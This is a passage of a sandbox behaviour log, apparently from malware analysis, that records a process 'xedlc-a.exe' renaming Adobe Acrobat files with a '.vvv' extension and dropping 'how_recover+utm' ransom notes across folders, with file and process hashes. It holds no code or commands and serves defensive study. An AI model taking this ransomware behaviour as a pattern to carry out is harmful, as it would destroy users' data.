- timestamp: 66532
- mode: close
- sequenceNumber: 741
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480940
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66556
- mode: rename
- sequenceNumber: 742
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953480940
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66566
- mode: created
- sequenceNumber: 743
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778201
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66572
- mode: close
- sequenceNumber: 744
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778201
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66608
- mode: created
- sequenceNumber: 745
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778202
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66614
- mode: close
- sequenceNumber: 746
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778202
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66650
- mode: created
- sequenceNumber: 747
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778203
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66657
- mode: close
- sequenceNumber: 748
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778203
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66678
- mode: created
- sequenceNumber: 749
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778204
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66684
- mode: close
- sequenceNumber: 750
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778204
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66692
- mode: open
- sequenceNumber: 751
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
- filesize: 10
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777392
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66723
- mode: close
- sequenceNumber: 752
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
- filesize: 430
- md5sum: 1ba711c91c2dc00e8407a31143007bd5
- sha1sum: 2701821c042ac53b60fec0e0bf04f77da97b62fc
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777392
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66805
- mode: rename
- sequenceNumber: 753
- filesize: 430
- md5sum: 1ba711c91c2dc00e8407a31143007bd5
- sha1sum: 2701821c042ac53b60fec0e0bf04f77da97b62fc
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js.vvv
- ads:
- fid (ads:): 281474976777392
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66814
- mode: created
- sequenceNumber: 754
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778205
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66821
- mode: close
- sequenceNumber: 755
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778205
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66841
- mode: created
- sequenceNumber: 756
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778206
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66848
- mode: close
- sequenceNumber: 757
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778206
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66868
- mode: created
- sequenceNumber: 758
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778207
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66876
- mode: close
- sequenceNumber: 759
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778207
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66885
- mode: created
- sequenceNumber: 760
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778208
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66893
- mode: close
- sequenceNumber: 761
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778208
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66901
- mode: open
- sequenceNumber: 762
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
- filesize: 566
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480937
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 66911
- mode: close
- sequenceNumber: 763
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480937
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66921
- mode: rename
- sequenceNumber: 764
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953480937
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 66931
- mode: open
- sequenceNumber: 765
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
- filesize: 774
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777388
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67017
- mode: close
- sequenceNumber: 766
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
- filesize: 1198
- md5sum: 86471f085850dfad47201dbb5472441d
- sha1sum: cc877087a53ccc0d8022209b13a95f14f1f0d58f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777388
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67026
- mode: rename
- sequenceNumber: 767
- filesize: 1198
- md5sum: 86471f085850dfad47201dbb5472441d
- sha1sum: cc877087a53ccc0d8022209b13a95f14f1f0d58f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt.vvv
- ads:
- fid (ads:): 281474976777388
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67038
- mode: open
- sequenceNumber: 768
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
- filesize: 195
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777390
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67044
- mode: close
- sequenceNumber: 769
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
- filesize: 622
- md5sum: bbd74955ba8657f49634609f7ec42966
- sha1sum: 61dd24ddbc69a0e86f642f3735faab1628211d02
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976777390
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67054
- mode: rename
- sequenceNumber: 770
- filesize: 622
- md5sum: bbd74955ba8657f49634609f7ec42966
- sha1sum: 61dd24ddbc69a0e86f642f3735faab1628211d02
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js.vvv
- ads:
- fid (ads:): 281474976777390
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67062
- mode: created
- sequenceNumber: 771
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778209
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67081
- mode: close
- sequenceNumber: 772
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778209
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67394
- mode: created
- sequenceNumber: 773
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778210
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67456
- mode: close
- sequenceNumber: 774
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778210
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67465
- mode: created
- sequenceNumber: 775
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778211
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67471
- mode: close
- sequenceNumber: 776
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778211
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67479
- mode: created
- sequenceNumber: 777
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778212
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67486
- mode: close
- sequenceNumber: 778
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778212
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67513
- mode: created
- sequenceNumber: 779
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778213
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67520
- mode: close
- sequenceNumber: 780
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778213
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67528
- mode: created
- sequenceNumber: 781
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778214
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67536
- mode: close
- sequenceNumber: 782
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778214
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67632
- mode: created
- sequenceNumber: 783
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778215
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67639
- mode: close
- sequenceNumber: 784
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778215
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67745
- mode: created
- sequenceNumber: 785
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778216
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 67778
- mode: close
- sequenceNumber: 786
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778216
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 67802
- mode: open
- sequenceNumber: 787
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
- filesize: 566
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480938
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 67815
- repeat: 50
- sequenceNumber: 788
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 68023
- mode: close
- sequenceNumber: 789
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953480938
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68033
- mode: rename
- sequenceNumber: 790
- filesize: 990
- md5sum: 9e34bc93256def5cfb3e477a242b77c4
- sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 562949953480938
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68060
- mode: created
- sequenceNumber: 791
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778217
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68067
- mode: close
- sequenceNumber: 792
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778217
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68073
- mode: created
- sequenceNumber: 793
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778218
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68079
- mode: close
- sequenceNumber: 794
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778218
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68088
- mode: created
- sequenceNumber: 795
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778219
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68094
- mode: close
- sequenceNumber: 796
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778219
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68121
- mode: created
- sequenceNumber: 797
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778220
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68128
- mode: close
- sequenceNumber: 798
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778220
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68136
- mode: created
- sequenceNumber: 799
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778221
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68142
- mode: close
- sequenceNumber: 800
